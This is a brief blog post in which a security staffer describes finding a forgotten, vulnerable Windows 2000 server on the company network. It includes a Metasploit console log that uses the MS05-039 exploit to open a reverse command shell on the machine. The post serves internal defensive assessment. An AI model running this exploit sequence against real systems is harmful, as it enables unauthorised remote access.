Locating hosts
An interesting thing happened today. A vulnerability scan I ran over the weekend identified a rather vulnerable server. When I asked the local IT department about it they had no clue about it nor its physical location.
The server’s name indicates it’s probably 5 – 6 years old. It isn’t a member of our new domain, which was created 3 -4 years ago. No one remembers the admin password nor the remote access password.
I was able to gain remote access using metasploit (from my Mac) and I can now down the system if I need to. However, we don’t know what systems are dependent on it. Netstat does show active connections from other servers so there is a chance of preventing access to some critical service if we shut down the box (which we still can’t physically locate).
+ — –=[ msfconsole v2.6 [149 exploits - 76 payloads]
msf > use ms05_039_pnp
msf ms05_039_pnp(win32_reverse) > set TARGET 0
TARGET -> 0
msf ms05_039_pnp(win32_reverse) > set RHOST 192.168.2.38
RHOST -> 192.168.2.38
msf ms05_039_pnp(win32_reverse) > set LHOST 192.168.5.61
LHOST -> 192.168.5.61
msf ms05_039_pnp(win32_reverse) > set LPORT 1024
LPORT -> 1024
msf ms05_039_pnp(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Detected a Windows 2000 target
[*] Sending request…
[*] Got connection from 192.168.5.61:1024 < -> 192.168.2.38:3459
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
To add insult to injury our network guru is out of the office today so he can’t do his switch-port magic to locate it.
This is a great example of why security teams should go through these drills periodically. I’d hate to have discovered this box once it was hammering our networks with a worm.
